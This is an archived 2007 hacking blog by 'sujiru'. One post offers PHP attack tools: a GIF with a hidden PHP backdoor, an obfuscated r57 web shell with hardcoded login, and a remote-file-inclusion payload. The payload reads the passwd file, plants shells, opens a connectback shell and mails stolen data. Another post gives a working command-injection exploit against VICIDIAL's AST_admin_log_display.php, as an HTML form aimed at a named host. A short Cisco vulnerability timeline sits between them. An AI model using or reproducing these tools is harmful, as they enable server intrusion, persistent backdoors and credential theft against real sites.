Saturday, May 26, 2007

Some PHP Tools


sujiru.googlepages.com/kidlat.gif - a working gif with php backdoor embedded. Useful for sites with a local file inclusion vulnerability and accepts only picture uploads.

Sujiru.php - r57 php shell ver 1.31. The original release was backdoored. They were removed from this file. The code was also obfuscated to frustrate casual examination by anyone finding and reading the file. User:sujiru Pass:akoaymaylobo. You can change the values declared in the file. Also available in .txt

Payload.php - Used primarily for RFI. Gives info about the host, reads the passwd file, looks for interesting files in the webroot. Automatically writes the above php shell in two locations, the first and last writeable directories it finds relative to the vulnerable script. Tries to establish a connectback shell to a host you specify. You can specify the host by using file.php?ip= or by editing the $ip variable. Also mails information. Note:Didn't have the time to clean the code, but everything works. Also available in .txt

Posted by sujiru at 9:29 PM | | Comments

Wednesday, May 23, 2007

Cisco FTP Vulnerability

Timeline:

May 9, 2007 - Cisco announce vulnerability

May 11, 2007 - Cisco says FTP vulnerability may provide hacker backdoor

May 15, 2007 - Some dispute the "backdoor" scenario

May 16, 2007 - Report about major cisco outage in Japan.

Posted by sujiru at 10:28 PM | | Comments

Sunday, May 20, 2007

VICIDIAL Vulnerability

VICIDIAL is a set of programs that are designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound call center suite. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer.

More information could be found at http://astguiclient.sourceforge.net/vicidial.html

Exploiting..

On the demo site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access thus giving out valid usernames and passwords. More info can be gotten from the file admin_changes_log.txt.

Once we have a valid username and password we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would be something like

<form action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get">
<input maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date">
<input type="submit" value="SUBMIT" name="SUBMIT">
</form>


Change the host and directory if needed and save as an .htm file. Spaces would appear to be filtered

Posted by sujiru at 2:34 AM |